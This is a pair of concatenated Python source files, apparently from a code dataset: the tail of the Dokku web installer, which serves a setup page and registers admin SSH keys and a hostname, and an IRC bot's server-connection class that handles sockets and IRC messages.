if "inactive" in ufw_output:
ufw_display = 'none'
except subprocess.CalledProcessError:
ufw_display = 'none'
nginx_dir = '/etc/nginx'
nginx_init = '/etc/init.d/nginx'
try:
command = "test -x /usr/bin/openresty"
subprocess.check_output(command, shell=True)
nginx_dir = '/usr/local/openresty/nginx/conf'
nginx_init = '/etc/init.d/openresty'
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_conf_dir = os.getenv('NGINX_CONF_DIR', '{0}/conf.d'.format(nginx_dir))
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_conf_dir):
with open('{0}/dokku-installer.conf'.format(nginx_conf_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f {0}/sites-enabled/*'.format(nginx_dir), shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def write_content(self, content):
try:
self.wfile.write(content)
except TypeError:
self.wfile.write(string_to_bytes(content))
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{UFW_DISPLAY}', ufw_display)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{AUTHORIZED_KEYS_LOCATION}', key_file)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.write_content(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
vhost_enable = 'false'
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
try:
proc.stdin.write(key)
except TypeError:
proc.stdin.write(string_to_bytes(key))
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'nginx_enable', 'true')
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
content = json.dumps({'status': 'ok'})
self.send_response(200)
self.end_headers()
self.write_content(content)
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(bytes_to_string(line))
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, int(m.group(1)))
if exists:
return max_num
else:
return None
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm {0}/conf.d/dokku-installer.conf && {1} stop && {1} start".format(nginx_dir, nginx_init)
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print("Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port))
httpd.serve_forever()
PAGE = """
<html>
<head>
<meta charset="utf-8" />
<title>Dokku Setup</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<style>
.bd-callout {
padding: 1.25rem;
margin-top: 1.25rem;
margin-bottom: 1.25rem;
border: 1px solid #eee;
border-left-width: .25rem;
border-radius: .25rem;
}
.bd-callout p:last-child {
margin-bottom: 0;
}
.bd-callout-info {
border-left-color: #5bc0de;
}
pre {
font-size: 80%;
margin-bottom: 0;
}
h1 small {
font-size: 50%;
}
h5 {
font-size: 1rem;
}
.container {
width: 640px;
}
.result {
padding-left: 20px;
}
input.form-control, textarea.form-control {
background-color: #fafbfc;
font-size: 14px;
}
input.form-control::placeholder, textarea.form-control::placeholder {
color: #adb2b8
}
</style>
</head>
<body>
<div class="container">
<form id="form" role="form">
<h1 class="pt-3">Dokku Setup <small class="text-muted">{VERSION}</small></h1>
<div class="alert alert-warning small" role="alert">
<strong>Warning:</strong> The SSH key filled out here can grant root access to the server. Please complete the setup as soon as possible.
</div>
<div class="row">
<div class="col">
<h3>Admin Access</h3>
<div class="form-group">
<label for="key">Public SSH Keys</label><br />
<textarea class="form-control" name="keys" rows="5" id="key" placeholder="Begins with 'ssh-rsa', 'ssh-dss', 'ssh-ed25519', 'ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', or 'ecdsa-sha2-nistp521'">{ADMIN_KEYS}</textarea>
<small class="form-text text-muted">Public keys allow users to ssh onto the server as the <code>dokku</code> user, as well as remotely execute Dokku commands. They are currently auto-populated from: <code>{AUTHORIZED_KEYS_LOCATION}</code>, and can be changed later via the <a href="http://dokku.viewdocs.io/dokku/deployment/user-management/" target="_blank"><code>dokku ssh-keys</code></a> plugin.</small>
</div>
</div>
</div>
<div class="row">
<div class="col">
<h3>Hostname Configuration</h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" placeholder="A hostname or ip address such as {HOSTNAME}" />
<small class="form-text text-muted">This will be used as the default host for all applications, and can be changed later via the <a href="http://dokku.viewdocs.io/dokku/configuration/domains/" target="_blank"><code>dokku domains:set-global</code></a> command.</small>
</div>
<div class="form-check">
<input class="form-check-input" type="checkbox" id="vhost" name="vhost" value="true">
<label class="form-check-label" for="vhost">Use virtualhost naming for apps</label>
<small class="form-text text-muted">When enabled, Nginx will be run on port 80 and proxy requests to apps based on hostname.</small>
<small class="form-text text-muted">When disabled, a specific port will be setup for each application on first deploy, and requests to that port will be proxied to the relevant app.</small>
</div>
<div class="alert alert-warning small mt-3 d-{UFW_DISPLAY}" role="alert">
<strong>Warning:</strong> UFW is active. To allow traffic to specific ports, run <code>sudo ufw allow PORT</code> for the port in question.
</div>
<div class="bd-callout bd-callout-info">
<h5>What will app URLs look like?</h5>
<pre><code id="example">http://hostname:port</code></pre>
</div>
</div>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span class="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
var $ = document.querySelector.bind(document)
function setup() {
if ($("#key").value.trim() == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($("#hostname").value.trim() == "") {
alert("Your hostname cannot be blank.")
return
}
var data = new FormData($("#form"))
var inputs = [].slice.call(document.querySelectorAll("input, textarea, button"))
inputs.forEach(function (input) {
input.disabled = true
})
var result = $(".result")
fetch("/setup", {method: "POST", body: data})
.then(function(response) {
if (response.ok) {
return response.json()
} else {
throw new Error('Server returned error')
}
})
.then(function(response) {
result.classList.add("text-success");
result.textContent = "Success! Redirecting in 3 seconds. .."
setTimeout(function() {
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
}, 3000);
})
.catch(function (error) {
result.classList.add("text-danger");
result.textContent = "Could not send the request"
})
}
function update() {
if ($("#vhost").matches(":checked") && $("#hostname").value.match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").checked = false;
}
if ($("#vhost").matches(':checked')) {
$("#example").textContent = "http://<app-name>."+$("#hostname").value
} else {
$("#example").textContent = "http://"+$("#hostname").value+":<app-port>"
}
}
$("#vhost").addEventListener("change", update);
$("#hostname").addEventListener("input", update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
serverconnection.py | import socket
import time
from threading import Thread
from messageparser import MessageParser, ParsedMessage, MessageType
from channel import IrcChannel
from dynamicmodule import DynamicModule
# Source: http://blog.initprogram.com/2010/10/14/a-quick-basic-primer-on-the-irc-protocol/
class ServerConnection(object):
"""
Class handling irc servers.
"""
PING_INTERVAL_THRESHOLD = 300 # 300 seconds
def __init__(self, networkname, server_config, bot_config, joinlist, modules_config):
self.alive = True
self.connected = False
self.hostname = server_config['hostname']
self.port = int(server_config.get('port', "6667"))
self.nick = bot_config['nick']
self.altnick = bot_config.get('altnick', self.nick + "_")
self.username = bot_config['username']
self.realname = bot_config['realname']
self.owner = bot_config['owner']
self.networkname = networkname
self.joinlist = joinlist
self._reader_thread = None
self._parser = MessageParser()
self._init_callback_table()
self._socket = None
self._channel_list = []
self._modules_config = modules_config
self.dynamic_modules = [DynamicModule(self, m, c) for m, c in modules_config.items()]
self._last_ping = time.time()
def _init_callback_table(self):
self._receive_callbacks = {
MessageType.PRIVATE_MESSAGE: self._private_message_received,
MessageType.JOIN: self._join_received,
MessageType.PART: self._part_received,
MessageType.PING: self._ping_received,
MessageType.QUIT: self._quit_received,
MessageType.TOPIC: self._topic_received,
MessageType.END_OF_MOTD: self._motd_received,
#MessageType.NICK_IN_USE: self.ni,
MessageType.TOPIC_REPLY: self._topic_reply_received,
MessageType.USERS: self._users_received,
MessageType.END_OF_USERS: self._users_end_received,
MessageType.CHANNEL_MESSAGE: self._channel_message_received,
MessageType.UNKNOWN: self._unknown_message_received,
MessageType.CTCP_TIME: self._ctcp_message_received,
MessageType.CTCP_VERSION: self._ctcp_version_received,
MessageType.CTCP_PING: self._ctcp_message_received,
MessageType.CTCP_DCC: self._ctcp_message_received,
}
def connect(self):
"""
Tries to connect to irc server.
"""
self._reader_thread = Thread(target=self._connection_loop)
self._reader_thread.start()
def _connect(self):
while self.alive:
try:
if self._socket:
self._socket.close()
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.connect((self.hostname, self.port))
self.NICK(self.nick)
self.USER(self.username, self.realname)
self._last_ping = time.time()
break
except Exception as e:
self._print_line(str(e) + " " + self.hostname)
self._print_line("Trying again in 30 seconds.")
self._sleep(30)
def _connection_loop(self):
while self.alive:
self._connect()
self._read()
if not self.alive:
break
self._print_line("Trying again in 60 seconds.")
self._sleep(60)
def _write(self, message):
"""
Prints and writes message to server.
"""
self._print_line(message[:-1])
self._socket.send(bytearray(message, 'utf-8'))
def _check_ping_time(self):
return time.time() - self._last_ping < ServerConnection.PING_INTERVAL_THRESHOLD
def _read(self):
"""
Reads and handles messages.
"""
self._socket.settimeout(1.0)
buff = ""
while self.alive and self._check_ping_time():
try:
tmp = self._socket.recv(4096)
except socket.timeout as e:
continue
except socket.error as e:
self._print_line(str(e))
break
except KeyboardInterrupt:
self.kill()
return
if not self.alive:
break
if not tmp:
break
tmp = tmp.decode('utf-8')
buff += tmp
parsed_messages, remainder = self._parser.parse_buffer(buff)
buff = remainder
self._handle_messages(parsed_messages)
self._socket.close()
self._print_line("Connection closed.")
self.connected = False
def _handle_messages(self, messages):
"""
Handles a list of messages
"""
for message in messages:
self._receive_callbacks[message.type](**message.params)
def _print_line(self, message):
"""
Prints message with timestamp.
"""
print(time.strftime("%H:%M:%S") + " |" + self.networkname + "| " + message)
def NICK(self, nick):
"""
Sets user's nick on server.
"""
self._write("NICK " + nick + "\r\n")
def USER(self, username, realname):
"""
Sets username and realname to server on connect.
"""
self._write("USER " + username + " 0 * :" + realname + "\r\n")
def PONG(self, message):
"""
Reply to PING.
"""
self._write("PONG :" + message + "\r\n")
def JOIN(self, channel):
"""
Joins a irc channel.
"""
self._write("JOIN :" + channel + "\r\n")
def PART(self, channel, reason=""):
"""
PARTs from a channel.
"""
msg = "PART " + channel
if reason:
msg += " :" + reason
self._write(msg + "\r\n")
def PRIVMSG(self, target, message):
"""
Sends PRIVMSG to target.
"""
self._write("PRIVMSG " + target + " :" + message + "\r\n")
def PING(self, message):
"""
Sends PING to server.
"""
self._write("PING " + message + "\r\n")
def CTCP(self, target, message):
self.PRIVMSG(target, str("\x01" + message + "\x01"))
def NOTICE(self, target, message):
self._write("NOTICE " + target + " :" + message + "\r\n")
def _on_connect(self):
"""
Called when connected to the network.
"""
self.PING(self.hostname)
self._join_channels()
for dm in self.dynamic_modules:
try:
dm.instance.on_connect()
except Exception as e:
print(e)
def _join_channels(self):
"""
Joins channels specified in self.joinlist
"""
for channel in self.joinlist:
self.JOIN(channel)
def kill(self):
"""
Called when the thread is wanted dead.
"""
self.alive = False
for m in self.dynamic_modules:
m.instance.kill()
def _private_message_received(self, **kw):
"""
Called when a private message has been received. Prints it
and calls on_private_message() on DynamicModule instances.
"""
source = kw['source']
message = kw['message']
full_mask = kw['full_mask']
self._print_line("PRIVATE" + " <" + source + "> " + message)
for dm in self.dynamic_modules:
try:
dm.instance.on_private_message(source, message, full_mask)
except Exception as e:
print(e)
def _channel_message_received(self, **kw):
"""
Called when a PRIVMSG to a channel has been received. Prints it
and calls on_channel_message() on DynamicModule instances.
"""
source = kw['source']
message = kw['message']
full_mask = kw['full_mask']
channel = kw['channel_name']
self._print_line(channel + " <" + source + "> " + message)
for dm in self.dynamic_modules:
try:
dm.instance.on_channel_message(source, channel, message, full_mask)
except Exception as e:
print(e)
def _ping_received(self, **kw):
"""
Called when PING message has been received.
"""
self._last_ping = time.time()
message = kw['message']
self.PONG(message)
def _motd_received(self, **kw):
"""
Called when the end of MOTD message
has been received.
"""
message = kw['message']
self._print_line(message)
if not self.connected:
self.connected = True
self._on_connect()
def _find_channel_by_name(self, channel_name):
"""
Returns a channel instance from channel_list
matching channel_name parameter or None.
"""
for channel in self._channel_list:
if channel.name == channel_name:
return channel
def _add_channel(self, name, user_list):
"""
Adds a channel to networks channel list.
"""
if self._find_channel_by_name(name):
return
channel = IrcChannel(name, user_list)
self._channel_list.append(channel)
def _users_received(self, **kw):
"""
Called when USERS message is received. Notifies
channel instance of the users.
"""
channel_name = kw['channel_name']
user_list = kw['user_list']
channel = self._find_channel_by_name(channel_name)
if not channel:
self._add_channel(channel_name, user_list)
return
channel.users_message(user_list)
def _users_end_received(self, **kw):
"""
Called when USERS message's end has been received.
Notifies the channel instance.
"""
channel_name = kw['channel_name']
channel = self._find_channel_by_name(channel_name)
if not channel:
# TODO FIX
self._print_line("REPORT THIS: usersEndReceived, channel not found")
return
channel.users_message_end()
self._print_line("USERS OF " + channel_name)
self._print_line(" ".join(channel.userlist))
def _quit_received(self, **kw):
"""
Called when a QUIT message has been received. Calls
on_quit() on DynamicModules
"""
nick = kw['nick']
full_mask = kw['full_mask']
for channel in self._channel_list:
channel.remove_user(nick)
self._print_line(nick + " has quit.")
for dm in self.dynamic_modules:
try:
dm.instance.on_quit(nick, full_mask)
except Exception as e:
print(e)
def _part_received(self, **kw):
"""
Called when a PART message has been received. Calls
on_part() on DynamicModules
"""
nick = kw['nick']
channel_name = kw['channel_name']
full_mask = kw['full_mask']
channel = self._find_channel_by_name(channel_name)
if not channel:
return
channel.remove_user(nick)
self._print_line(nick + " has parted " + channel_name)
for dm in self.dynamic_modules:
try:
dm.instance.on_part(nick, channel_name, full_mask)
except Exception as e:
print(e)
def _join_received(self, **kw):
"""
Called when a JOIN message has been received. Calls
on_join() on DynamicModules
"""
nick = kw['nick']
channel_name = kw['channel_name']
full_mask = kw['full_mask']
channel = self._find_channel_by_name(channel_name)
if channel:
channel.add_user(nick)
self._print_line(nick + " has joined " + channel_name)
for dm in self.dynamic_modules:
try:
dm.instance.on_join(nick, channel_name, full_mask)
except Exception as e:
print(e)
def _topic_received(self, **kw):
"""
Called when topic is changed on a channel. Calls on_topic()
on DynamicModules
"""
nick = kw['nick']
channel_name = kw['channel_name']
full_mask = kw['full_mask']
topic = kw['topic']
channel = self._find_channel_by_name(channel_name)
if channel:
channel.topic = topic
self._print_line(nick + " changed the topic of " + channel_name + " to: " + topic)
for dm in self.dynamic_modules:
try:
dm.instance.on_topic(nick, channel_name, topic, full_mask)
except Exception as e:
print(e)
def _topic_reply_received(self, **kw):
"""
Called when server responds to client's /topic or server informs
of the topic on joined channel.
"""
channel_name = kw['channel_name']
topic = kw['topic']
channel = self._find_channel_by_name(channel_name)
if channel:
channel.topic = topic
self._print_line("Topic in " + channel_name + ": " + topic)
def _ctcp_message_received(self, **kw):
self._print_line("CTCP: " + str(kw))
def _ctcp_version_received(self, **kw):
":juke!juke@jukk.is NOTICE irckaaja :VERSION ?l? hakkeroi!"
self.NOTICE(kw['source'], "\x01VERSION irckaaja 0.1.0\x01")
def _unknown_message_received(self, **kw):
self._print_line(kw['message'])
def _sleep(self, seconds):
"""
Sleeps for seconds unless not self.alive.
"""
start = time.time()
while time.time() < start + seconds and self.alive:
time.sleep(1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.